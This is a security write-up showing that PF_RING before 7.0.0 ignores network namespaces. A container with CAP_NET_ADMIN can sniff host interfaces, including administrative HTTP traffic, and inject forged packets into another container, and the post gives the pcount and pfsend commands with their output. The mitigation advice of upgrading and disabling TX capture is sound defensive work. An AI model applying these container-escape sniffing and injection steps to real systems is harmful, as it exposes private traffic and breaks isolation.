Breaking namespace isolation with PF_RING before 7.0.0

Linux hardening and proper isolation using containerization can be tricky especially when performance is critical.

We recently helped a client to design a secure network appliance that involve sniffing network traffic. This device has high security and performance constraints.

This post is a feedback on the unlikely integration of fast sniffers with linux containers.

Context

Let's consider a network appliance running Linux that use PF_RING to lift packets from the NIC and feed those to sniffers isolated in containers.

PF_RING is a faster alternative to classic RAW socket sniffing. In a nutshell, packets coming from the NIC driver are put in a circular buffer without any processing. The sniffer then mmap() the buffer in userspace to access network packets.

PF_RING vanilla

Considering the security hardening requirements of the appliance, the sniffer should be as isolated as possible. Isolation should have as little of a performance impact as possible. Containers are a pretty good fit for this use case.

Before version 7.0.0 (the very last one as of this writing), PF_RING didn't support network namespaces. The only solution for the sniffers to access the circular packet buffer was to grant the CAP_NET_ADMIN capability. Granting that capability for a "normal" hardened container isn't great but with PF_RING it's worse...

Example architecture

Consider the following design for a dummy network sniffer:

Dummy IDS design

To quickly troubleshoot things, all containers are fully-fledge Ubuntu distributions. In a real-life scenario the ids-container would be super minimal and hardened. LxC v2 is used but the setup could be replicated with the container provider of your choice.

The host system has 2 network interfaces:

  • administration is performed on the secure LAN if-admin
  • sniffing is possible on the interface if-sniff

 

root@host:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: if-admin: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 52:54:00:4c:97:df brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.221/24 brd 192.168.122.255 scope global if-admin
       valid_lft forever preferred_lft forever
    inet6 fe80::5054:ff:fe4c:97df/64 scope link
       valid_lft forever preferred_lft forever
3: if-sniff: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 22:22:22:22:22:22 brd ff:ff:ff:ff:ff:ff
    inet 192.168.110.2/24 brd 192.168.110.255 scope global if-sniff
       valid_lft forever preferred_lft forever
    inet6 fe80::2022:22ff:fe22:2222/64 scope link
       valid_lft forever preferred_lft forever
4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.1/24 brd 192.168.0.255 scope global br0
       valid_lft forever preferred_lft forever
    inet6 fe80::4030:e8ff:fe9a:c32b/64 scope link
       valid_lft forever preferred_lft forever
6: veth89U9YK@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br0 state UP group default qlen 1000
    link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::fcf8:d8ff:fe60:1337/64 scope link
       valid_lft forever preferred_lft forever

root@host:~# ls -l /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May  4 14:40 /proc/self/ns/net -> net:[4026531957]

veth89U9YK@if5 is the virtual interface pair device of internet0 in app_container.

app-container only exposes sensitive services on the interface if-admin:

root@app-container:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
5: internet0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:01:54:9a:34 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.2/24 brd 192.168.0.255 scope global internet0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:1ff:fe54:9a34/64 scope link
       valid_lft forever preferred_lft forever

root@app-container:~# ls -al /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May  4 12:48 /proc/self/ns/net -> net:[4026532250]

root@app-container:~# ss -tan
State      Recv-Q Send-Q        Local Address:Port          Peer Address:Port
LISTEN     0      5               192.168.0.2:8080                     *:*

# The exposed service is reachable by the administrator
admin@it:~$ curl 192.168.122.221
Hello Admin

ids-container does not have any interface configured as it accesses if-sniff through PF_RING with CAP_NET_ADMIN:

root@ids-container:~# ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

root@ids-container:~# ls /sys/class/net/
lo

root@ids-container:~# grep ^Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 0000000000001000
CapEff: 0000000000001000
CapBnd: 0000000000001000
CapAmb: 0000000000000000

root@ids-container:~# capsh --decode=0000000000001000
0x0000000000001000=cap_net_admin

root@ids-container:~# ls -ls /proc/self/ns/net
0 lrwxrwxrwx 1 root root 0 May  4 12:52 /proc/self/ns/net -> net:[4026532310]

Communication between app-container and ids-container is not represented but let's say it's a channel not based on the networking stack.

On the host, the PF_RING kernel module is loaded with the default configuration and network interfaces are correctly detected:

root@host:~# insmod ./PF_RING-6.6.0/kernel/pf_ring.ko

root@host:~# grep -r . /sys/module/pf_ring/parameters/*
/sys/module/pf_ring/parameters/enable_debug:0
/sys/module/pf_ring/parameters/enable_frag_coherence:1
/sys/module/pf_ring/parameters/enable_ip_defrag:0
/sys/module/pf_ring/parameters/enable_tx_capture:1
/sys/module/pf_ring/parameters/force_ring_lock:0
/sys/module/pf_ring/parameters/min_num_slots:4096
/sys/module/pf_ring/parameters/perfect_rules_hash_size:4096
/sys/module/pf_ring/parameters/quick_mode:0
/sys/module/pf_ring/parameters/transparent_mode:0

root@host:~# cat /proc/net/pf_ring/info
PF_RING Version          : 6.6.0 (unknown)
Total rings              : 0

Standard (non ZC) Options
Ring slots               : 4096
Slot version             : 16
Capture TX               : Yes [RX+TX]
IP Defragment            : No
Socket Mode              : Standard
Cluster Fragment Queue   : 0
Cluster Fragment Discard : 0

root@host:~# ls -1 /proc/net/pf_ring/dev/
br0  if-admin  if-sniff  internet0  vethLXOGMB

Breaking namespace isolation

Everything looks good, we can sniff on the interface if-sniff inside the ids-container.

root@ids-container:./PF_RING-6.6.0/userland/examples# ./pcount -i if-sniff
Capturing from if-sniff

[...]

=========================
Absolute Stats: [7 pkts rcvd][0 pkts dropped]
Total Pkts=7/Dropped=0.0 %
7 pkts [0.7 pkt/sec] - 398 bytes [0.00 Mbit/sec]
=========================
Actual Stats: 1 pkts [747.6 ms][1.34 pkt/sec]
=========================

This looks good, until you try to sniff the interface any from within the ids-container... and get the packets of if-admin.

root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i any -v 2 -f 'tcp port 80'
Capturing from any

[...]

14:03:15.177815 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=133][len=133]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 77 D1 DE 40 00 40 06 F2 72 C0 A8 7A 01 C0 A8 7A DD D4 E0 00 50 9F 50 0F E1 22 04 08 77 50 18 00 E5 76 99 00 00 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 39 32 2E 31 36 38 2E 31 32 32 2E 32 32 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 35 38 2E 30 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 0D 0A
# GET / HTTP/1.1\r\nHost: 192.168.122.221\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n

[...]

14:03:15.178253 [52:54:00:4C:97:DF -> 52:54:00:38:2D:01] [TCP][192.168.122.221 -> 192.168.122.1] [caplen=172][len=172]
52 54 00 38 2D 01 52 54 00 4C 97 DF 08 00 45 00 00 9E A3 5E 40 00 3F 06 21 CC C0 A8 7A DD C0 A8 7A 01 00 50 D4 E0 22 04 08 88 9F 50 10 30 50 19 00 E5 76 C0 00 00 53 65 72 76 65 72 3A 20 42 61 73 65 48 54 54 50 2F 30 2E 33 20 50 79 74 68 6F 6E 2F 32 2E 37 2E 36 0D 0A 44 61 74 65 3A 20 46 72 69 2C 20 30 34 20 4D 61 79 20 32 30 31 38 20 31 34 3A 30 33 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 74 65 78 74 0D 0A 0D 0A 48 65 6C 6C 6F 20 41 64 6D 69 6E 0A
# Server: BaseHTTP/0.3 Python/2.7.6\r\nDate: Fri, 04 May 2018 13:33:45 GMT\r\nContent-type: application/text\r\n\r\nHello Admin\n'

[...]

Indeed, any should correspond to all interfaces available in the network namespace. However this version of PF_RING doesn't support namespace isolation, so you get access to all of the host network interfaces. Effectively breaking the isolation.

Sniffing on one of the host network interface is also possible:

root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i if-admin -v 2 -f 'tcp port 80'
Capturing from if-admin
14:05:37.490554 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=74][len=74]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 3C 63 6B 40 00 40 06 61 21 C0 A8 7A 01 C0 A8 7A DD D4 EC 00 50 BC 71 0A 5C 00 00 00 00 A0 02 72 10 76 5E 00 00 02 04 05 B4 04 02 08 0A DC 3A BF 3F 00 00 00 00 01 03 03 07
[...]

Slight complication, accessing the host interfaces list from the container isn't possible. The pfring_findalldevs() function in the userland library ends up using the results from pfring_mod_findalldevs() which extracts the interfaces' names from /proc/net/pf_ring/dev/<iface>/info. Unless the LxC configuration explicitly mounts this path to the container, which should never happen, some interface name guessing is needed. A light bruteforce is required for systems with systemd udev version >= 197.

Loading the PF_RING module with default configuration also allows for writing packets to network interfaces.

root@host:~# grep TX /proc/net/pf_ring/info
Capture TX               : Yes [RX+TX]

To prove injecting an arbitrary packet from ids-container to app-container through PF_RING, a pcap of a simple UDP connection is captured and later injected:

# Captured packet to inject
root@ids-container:~# tcpdump -XX -r UDP_test_packet.pcap
reading from file UDP_test_packet.pcap, link-type EN10MB (Ethernet)
16:48:13.894163 IP 192.168.122.1.54219 > 192.168.122.221.1234: UDP, length 5
    0x0000:  5254 004c 97df 5254 0038 2d01 0800 4500  RT.L..RT.8-...E.
    0x0010:  0021 2982 4000 4011 9b1a c0a8 7a01 c0a8  .!).@.@.....z...
    0x0020:  7add d3cb 04d2 000d 764e 4142 4344 0a    z.......vNABCD.

root@ids-container:./PF_RING-6.6.0/userland/examples# ./pfsend -f /UDP_test_packet.pcap -i internet0 -m 00:16:01:3b:aa:a7 -b 1 -v -S 192.168.0.3 -D 192.168.0.2 -z
Sending packets on internet0
Using PF_RING v.6.6.0
Read 47 bytes packet from pcap file /UDP_test_packet.pcap [0.0 Secs =  0 ticks@0hz from beginning]
Read 1 packets from pcap file /UDP_test_packet.pcap
Dumping statistics on /proc/net/pf_ring/stats/2737-internet0.16
[0] pfring_send(47) returned 47
TX rate: [current 7'751.93 pps/0.00 Gbps][average 7'751.93 pps/0.00 Gbps][total 1.00 pkts]
Sent 1 packets

# In `app-container`, the forged packet is received
root@app-container:/# tcpdump -vv -n -i internet0 -XX
tcpdump: listening on internet0, link-type EN10MB (Ethernet), capture size 262144 bytes
15:50:40.297378 IP (tos 0x0, ttl 64, id 10626, offset 0, flags [DF], proto UDP (17), length 33)
    192.168.0.3.54219 > 192.168.0.2.1234: [udp sum ok] UDP, length 5
        0x0000:  0016 013b aaa7 5254 0038 2d01 0800 4500  ...;..RT.8-...E.
        0x0010:  0021 2982 4000 4011 8ff4 c0a8 0003 c0a8  .!).@.@.........
        0x0020:  0002 d3cb 04d2 000d 175a 4142 4344 0a    .........ZABCD.

Mitigation

Make the change to version 7.0.0 of PF_RING, this last version patches the namespace isolation problem and introduce capture interface white-listing. Proper configuration of the kernel module and host+container hardening can be used to reduce the risk if upgrading is not a possibility.

Additionnaly, "Capture TX" should be disabled if your sniffer don't use it.

root@host:~# insmod ./pf_ring.ko enable_tx_capture=0

Conclusion

We have seen that despite the use of containers, some external components don't support namespaces. In our setup, the isolated sniffer could in fact:

  • Monitor the administration network interface
  • Inject traffic to any network interface
  • Route packets between all network interfaces
  • Exfiltrate sniffed packets back to the attacker

The thing to remember here is that PF_RING is just one example. The same type of vulnerability might be found with netmap, DPDK, Snabbswitch, etc. "This is left as an exercise for the reader" ;)

Performance and security are not always such good friends.